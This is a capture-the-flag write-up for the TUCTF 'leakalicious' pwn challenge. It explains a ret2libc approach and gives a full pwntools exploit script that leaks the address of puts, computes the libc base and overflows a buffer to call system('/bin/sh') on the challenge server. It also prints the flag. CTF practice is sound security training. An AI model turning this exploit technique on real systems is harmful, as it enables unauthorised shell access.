
My solutions for various CTF challenges

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PWN - Points: 500

King Arthur has proposed this challenge for all those who consider themselves worthy.

nc chal.tuctf.com 30505


Leak the address of puts and search for the correct libc version, e.g by using this website: https://libc.blukat.me/. Then calculate the offsets and overflow the buffer with system and /bin/sh.

Exploit script:

from pwn import *

libc = ELF('libc6_2.29-0ubuntu2_i386.so')

# context.terminal = ['termite', '-e']
# p = gdb.debug('./leakalicious')
# p = process('leakalicious')
p = remote('chal.tuctf.com', 30505)

p.sendlineafter('> ', 'A' * 31)
print p.recvline()

libc_base = u32(p.recvline()[:-2]) - libc.symbols['puts']
print hex(libc_base)

sh = libc_base + libc.search("/bin/sh").next()

p.sendlineafter('> ', 'A')
p.sendlineafter('> ', 'A' * 44 + p32(libc_base+libc.symbols['system']) + p32(0x0) + p32(sh))

flag: TUCTF{cl0udy_w17h_4_ch4nc3_0f_l1bc}